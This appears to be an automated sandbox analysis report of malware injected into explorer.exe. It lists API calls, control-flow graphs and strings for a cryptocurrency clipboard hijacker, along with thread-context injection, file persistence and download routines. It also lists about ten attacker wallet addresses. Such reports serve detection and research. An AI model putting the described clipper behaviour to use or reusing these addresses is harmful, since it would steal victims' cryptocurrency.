                                                                                                                                                                                                                          control_flow_graph 577 e8c7540-e8c756a call e8c7b90 580 e8c7570-e8c75a6 call e8c7af0 call e8b2c20 call e8c7430 call e8c7c20 577->580 589 e8c75a8-e8c7606 call e8b1100 call e8b2c20 call e8c7430 call e8c7c90 call e8b2c20 call e8c7ce0 call e8b1200 580->589 590 e8c760b-e8c7638 call e8b2c20 call e8c7430 call e8c7c20 580->590 589->590 603 e8c769d-e8c76ca call e8b2c20 call e8c7430 call e8c7c20 590->603 604 e8c763a-e8c7698 call e8b1100 call e8b2c20 call e8c7430 call e8c7c90 call e8b2c20 call e8c7ce0 call e8b1200 590->604 624 e8c76cc-e8c772a call e8b1100 call e8b2c20 call e8c7430 call e8c7c90 call e8b2c20 call e8c7ce0 call e8b1200 603->624 625 e8c772f-e8c775c call e8b2c20 call e8c7430 call e8c7c20 603->625 604->603 624->625 645 e8c775e-e8c77bc call e8b1100 call e8b2c20 call e8c7430 call e8c7c90 call e8b2c20 call e8c7ce0 call e8b1200 625->645 646 e8c77c1-e8c77ee call e8b2c20 call e8c7430 call e8c7c20 625->646 645->646 666 e8c77f0-e8c784e call e8b1100 call e8b2c20 call e8c7430 call e8c7c90 call e8b2c20 call e8c7ce0 call e8b1200 646->666 667 e8c7853-e8c7880 call e8b2c20 call e8c7430 call e8c7c20 646->667 666->667 687 e8c78e5-e8c7912 call e8b2c20 call e8c7430 call e8c7c20 667->687 688 e8c7882-e8c78e0 call e8b1100 call e8b2c20 call e8c7430 call e8c7c90 call e8b2c20 call e8c7ce0 call e8b1200 667->688 708 e8c7914-e8c7972 call e8b1100 call e8b2c20 call e8c7430 call e8c7c90 call e8b2c20 call e8c7ce0 call e8b1200 687->708 709 e8c7977-e8c79a4 call e8b2c20 call e8c7430 call e8c7c20 687->709 688->687 708->709 729 e8c7a09-e8c7a36 call e8b2c20 call e8c7430 call e8c7c20 709->729 730 e8c79a6-e8c7a04 call e8b1100 call e8b2c20 call e8c7430 call e8c7c90 call e8b2c20 call e8c7ce0 call e8b1200 709->730 750 e8c7a38-e8c7a96 call e8b1100 call e8b2c20 call e8c7430 call e8c7c90 call e8b2c20 call e8c7ce0 call e8b1200 729->750 751 e8c7a9b-e8c7aa0 call e8e0068 729->751 730->729 750->751 756 e8c7aa6-e8c7aaf call e8b1200 751->756 756->580
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: OpenClipboard.USER32 ref: 0E8C7B01
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: GetClipboardData.USER32 ref: 0E8C7B13
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: GlobalLock.KERNEL32 ref: 0E8C7B24
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: GlobalUnlock.KERNEL32 ref: 0E8C7B35
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: CloseClipboard.USER32 ref: 0E8C7B3B
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: GlobalAlloc.KERNEL32 ref: 0E8C7D08
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: GlobalLock.KERNEL32 ref: 0E8C7D1F
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: GlobalUnlock.KERNEL32 ref: 0E8C7D37
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: OpenClipboard.USER32 ref: 0E8C7D3F
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: EmptyClipboard.USER32 ref: 0E8C7D45
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: SetClipboardData.USER32 ref: 0E8C7D53
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: CloseClipboard.USER32 ref: 0E8C7D59
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0E8C7AA0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0E8C7A38
                                                                                                                                                                                                                          • 0xe082eae973143a32d82db061b6c8885ceba72b87, xrefs: 0E8C763A
                                                                                                                                                                                                                          • B8IH, xrefs: 0E8C7557
                                                                                                                                                                                                                          • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0E8C7914
                                                                                                                                                                                                                          • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0E8C7882
                                                                                                                                                                                                                          • LNYd8g8WfirJtTvQuhrEZ5BD9hua18kaVK, xrefs: 0E8C775E
                                                                                                                                                                                                                          • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0E8C77F0
                                                                                                                                                                                                                          • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0E8C79A6
                                                                                                                                                                                                                          • 1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 0E8C75A8
                                                                                                                                                                                                                          • TMjbm61ctPtZqDVxeZHgXRw4Tq8gzZo9Jq, xrefs: 0E8C76CC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                          • String ID: 0xe082eae973143a32d82db061b6c8885ceba72b87$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$B8IH$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LNYd8g8WfirJtTvQuhrEZ5BD9hua18kaVK$TMjbm61ctPtZqDVxeZHgXRw4Tq8gzZo9Jq$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                          • API String ID: 2992153386-758494896
                                                                                                                                                                                                                          • Opcode ID: ef6a4bfc034eb6a153bef323cbf05477a6a9cfc505bd8e7af2e175d1072a2601
                                                                                                                                                                                                                          • Instruction ID: fa10a7717269778edb869975fbc27fca3121cfd65e5dc778dfb328be33242ecc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef6a4bfc034eb6a153bef323cbf05477a6a9cfc505bd8e7af2e175d1072a2601
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D15F61711A42A6DF00EFB9D4642DC63A5E7557CCFC058279A0DEBB68EF34CA09C391
                                                                                                                                                                                                                          Function 0E8BF2E0 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 776 e8bf2e0-e8bf321 CreateFileW 777 e8bf323-e8bf32f 776->777 778 e8bf330-e8bf370 GetFileSize call e8e0058 HeapAlloc 776->778 781 e8bf372-e8bf38d ReadFile 778->781 782 e8bf3b0-e8bf3b8 call e8e0040 778->782 784 e8bf399-e8bf3ad call e8e0058 HeapFree 781->784 785 e8bf38f-e8bf397 781->785 790 e8bf45c-e8bf478 782->790 784->782 785->784 787 e8bf3bd-e8bf3df 785->787 791 e8bf44b-e8bf459 call e8e0040 787->791 792 e8bf3e1-e8bf3f6 call e8beee0 787->792 791->790 797 e8bf3f8-e8bf3fd 792->797 798 e8bf401-e8bf42e call e8e0058 HeapAlloc 792->798 797->792 799 e8bf3ff 797->799 798->791 802 e8bf430-e8bf447 call e8ccf80 798->802 799->791 802->791
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3250796435-0
                                                                                                                                                                                                                          • Opcode ID: a570c59ff07c8582ff7f9362800e75dde1297c6a14a7e496a45d1ca199ab8740
                                                                                                                                                                                                                          • Instruction ID: 5dca6be72a89fb288a8d95ad9c6d00486df8b75bf1e355e7d3512a8ff310339c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a570c59ff07c8582ff7f9362800e75dde1297c6a14a7e496a45d1ca199ab8740
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A41BE32300B8187DB60CF66EC5476A77A5FB89B94F048925CF9E97B94EF38C4498B10
                                                                                                                                                                                                                          Function 0E8C50D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 826 e8c50d0-e8c514a lstrcpyA call e8b9450 830 e8c514c-e8c515e call e8f07f0 826->830 831 e8c51c7-e8c51db free call e8f0868 SleepEx 826->831 836 e8c5170-e8c5197 StrChrA call e8f07f8 830->836 837 e8c5160-e8c5165 call e8c5570 830->837 842 e8c5199-e8c519c 836->842 843 e8c51a0-e8c51a3 836->843 837->831 842->843 844 e8c51a5-e8c51bd call e8f0808 call e8c5450 843->844 845 e8c51c2-e8c51c5 843->845 844->845 845->831 845->836
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32 ref: 0E8C512F
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: EnterCriticalSection.KERNEL32 ref: 0E8B9498
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: RtlInitializeCriticalSection.NTDLL ref: 0E8B94A5
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94FD
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B950D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B951D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: LeaveCriticalSection.KERNEL32 ref: 0E8B95A4
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: memcpy.MSVCRT ref: 0E8B95BC
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrlenA.KERNEL32 ref: 0E8B95CA
                                                                                                                                                                                                                          • lstrcmp.KERNEL32 ref: 0E8C5156
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C51CA
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0E8C51D5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 4292776791-109466966
                                                                                                                                                                                                                          • Opcode ID: 96e53470d1276391f0d3e9ebc9b3fe0843cd8b69290cef162e5c6cd72c2f1f32
                                                                                                                                                                                                                          • Instruction ID: 3efed578c4565b3ab81e5ee9f6306d71a294dba4d23e35fa21943ca1fba30652
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96e53470d1276391f0d3e9ebc9b3fe0843cd8b69290cef162e5c6cd72c2f1f32
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D218031215B81C9EB10DF25E85435AB7E6FB89B84F848829DA8D97B59EF3CD404CB44
                                                                                                                                                                                                                          Function 0E8BF040 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu$:$B8IH
                                                                                                                                                                                                                          • API String ID: 3001812590-3132285007
                                                                                                                                                                                                                          • Opcode ID: 6bb8f0452dc48ed42a104bb424a482e778bff8d2b367419224321099e76585b0
                                                                                                                                                                                                                          • Instruction ID: 7d6deaa40193cfaacedcdc09bd2bf3f0c3b7889620f316a6caafd8d2a4ef1391
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bb8f0452dc48ed42a104bb424a482e778bff8d2b367419224321099e76585b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11311A36618680CAD710CFA9E85039AB7B4FB99344F50581AE78DC7B28EB7DC905CF00
                                                                                                                                                                                                                          Function 0E8BEF20 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu$:\$B8IH
                                                                                                                                                                                                                          • API String ID: 3001812590-4267645926
                                                                                                                                                                                                                          • Opcode ID: f49aab7a8f087b4db7fdd291aae639e20113c460a4db87b972b1626037c6f69d
                                                                                                                                                                                                                          • Instruction ID: 1cd5b439ed52539d3e5caee6cfea3b80a0793c1d99bdd64effe22968cc5007b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f49aab7a8f087b4db7fdd291aae639e20113c460a4db87b972b1626037c6f69d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C311A322187C4CAD711CF69E89038ABBA1F799354F54492AEBC983B28DB7CC549CF00
                                                                                                                                                                                                                          Function 0E8C5450 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: lstrlenA.KERNEL32 ref: 0E8C5282
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: InternetCrackUrlA.WININET ref: 0E8C5297
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: PathFindFileNameW.SHLWAPI ref: 0E8C531C
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: GetTempPathW.KERNEL32 ref: 0E8C5336
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: GetTempFileNameW.KERNEL32 ref: 0E8C534C
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: lstrcatW.KERNEL32 ref: 0E8C535C
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: lstrcatW.KERNEL32 ref: 0E8C5368
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: CreateFileW.KERNEL32 ref: 0E8C5391
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: SHGetFolderPathW.SHELL32 ref: 0E8BF1D5
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF1E5
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF1F3
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: CreateDirectoryW.KERNEL32 ref: 0E8BF1FE
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: SetFileAttributesW.KERNEL32 ref: 0E8BF20C
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF21C
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF22A
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF23A
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32 ref: 0E8C54E5
                                                                                                                                                                                                                          • CopyFileW.KERNEL32 ref: 0E8C54FB
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 0E8C550C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$Path$AttributesCreateNameTemp$CopyCrackDeleteDirectoryFindFolderInternetlstrlen
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 3447680573-109466966
                                                                                                                                                                                                                          • Opcode ID: 7f49b66afa7c0b190dc72cc57ffd92d7ba36ceae248c7b52d8005671203e4e27
                                                                                                                                                                                                                          • Instruction ID: cd588245d8f641d60b73c0564675ef453444f534d8d2779252d73169b9653377
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f49b66afa7c0b190dc72cc57ffd92d7ba36ceae248c7b52d8005671203e4e27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58214122324AC596DF30DF65E8A876BA361FB89748FC09415C64D8B958EF3CD605CB05
                                                                                                                                                                                                                          Function 0E8B8FE0 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 939 e8b8fe0-e8b8fed 940 e8b904f-e8b9054 939->940 941 e8b8fef-e8b8ff9 939->941 942 e8b8ffb 941->942 943 e8b9038-e8b904a HeapFree 941->943 944 e8b9000-e8b9018 OpenThread 942->944 943->940 945 e8b901a-e8b9026 ResumeThread call e8e0040 944->945 946 e8b902c-e8b9031 944->946 945->946 946->944 948 e8b9033 946->948 948->943
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 993137029-0
                                                                                                                                                                                                                          • Opcode ID: 350b1093ccfd2c3c2c73eb94d1ee066efdd318783ec75fd0ecdc008773dfeb84
                                                                                                                                                                                                                          • Instruction ID: 5f088d8d991364b511fbed127221b5dd588ef4080efd8744e759864098d47163
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 350b1093ccfd2c3c2c73eb94d1ee066efdd318783ec75fd0ecdc008773dfeb84
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B016D36A15A80C2EB048F62E49435D7371FB88B84F088425DB0A57B54CF39C452CB00
                                                                                                                                                                                                                          Function 0E8CB3C0 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2372642624-0
                                                                                                                                                                                                                          • Opcode ID: 58190a93ded2dde5e8871cad741f0538f53c091da1e701dab678116d39fd0d8f
                                                                                                                                                                                                                          • Instruction ID: 202eaffbbc941a48f4a361918ecf68bb59b3920afa274a84b0e6dbb4e70b9011
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58190a93ded2dde5e8871cad741f0538f53c091da1e701dab678116d39fd0d8f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01E08C60A11B8083EF2917B1A88A3791391AB5DB01F445C28C80EA9390EE7CCADA8308
                                                                                                                                                                                                                          Function 0E8B8750 Relevance: 4.6, APIs: 3, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 882653843-0
                                                                                                                                                                                                                          • Opcode ID: 75f636435a0f4809db09609f496f6760a96ec8b1148eb731a98781e445c4eafc
                                                                                                                                                                                                                          • Instruction ID: 609e7a8e85ecbe8b82adaafab7334ff83de8c58b7ce29590097cb6930848c9b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75f636435a0f4809db09609f496f6760a96ec8b1148eb731a98781e445c4eafc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6731E1A32086C087C7198F36E5013AD7B60F349F88F088216EF988B79ACB2CC851C758
                                                                                                                                                                                                                          Function 0E8B8AA0 Relevance: 4.5, APIs: 3, Instructions: 45threadinjectionCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: GetCurrentProcessId.KERNEL32 ref: 0E8B890B
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: GetCurrentThreadId.KERNEL32 ref: 0E8B8917
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: HeapAlloc.KERNEL32 ref: 0E8B8941
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: Thread32Next.KERNEL32 ref: 0E8B89A0
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: CloseHandle.KERNEL32 ref: 0E8B89B0
                                                                                                                                                                                                                          • OpenThread.KERNEL32 ref: 0E8B8AEE
                                                                                                                                                                                                                          • SuspendThread.KERNEL32 ref: 0E8B8AFF
                                                                                                                                                                                                                            • Part of subcall function 0E8B8EA0: GetThreadContext.KERNEL32 ref: 0E8B8ED4
                                                                                                                                                                                                                            • Part of subcall function 0E8B8EA0: SetThreadContext.KERNEL32 ref: 0E8B8F94
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B8B16
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4205413918-0
                                                                                                                                                                                                                          • Opcode ID: fb0b88b831a84adbd08517c03dc5737f98b5e285529bda5c5170a0eb1dd0c5da
                                                                                                                                                                                                                          • Instruction ID: 5beb50301e503653f6574b6b2fc5d0ad59d265eb9ac8d2185d67559c0a1673fa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb0b88b831a84adbd08517c03dc5737f98b5e285529bda5c5170a0eb1dd0c5da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21016D32215B84C7D718DF16E49065EB7A4F789F80F589429DB9A97B14CF38D862CB04
                                                                                                                                                                                                                          Function 0E8B8DB0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8B8860: Sleep.KERNEL32 ref: 0E8B888C
                                                                                                                                                                                                                          • HeapCreate.KERNEL32 ref: 0E8B8DCD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateHeapSleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 221814145-0
                                                                                                                                                                                                                          • Opcode ID: 2566898438aa13b641ec1c9a74339e6218832f4f3109a69167c1f6b2db446f76
                                                                                                                                                                                                                          • Instruction ID: 206aff9efa9cde6f9d89a43bd98a9c19316e5b7ef578bec563b8a671b55eb1e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2566898438aa13b641ec1c9a74339e6218832f4f3109a69167c1f6b2db446f76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73E0925171270083EF6DBBB958923A91088DF48310F4C5C38CE0CC6781DE2D4CEB57A6

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 0E8B1370 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                          • String ID: @$B8IH
                                                                                                                                                                                                                          • API String ID: 596952117-2566893802
                                                                                                                                                                                                                          • Opcode ID: 4fee09da6d689d869712edbc9f3647fd5830afbe0c47d0c9cd235d62fc0a3f09
                                                                                                                                                                                                                          • Instruction ID: 973200f0f112b2efeb43464f721761ab44869feebf7dc420f773a63919526f8f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fee09da6d689d869712edbc9f3647fd5830afbe0c47d0c9cd235d62fc0a3f09
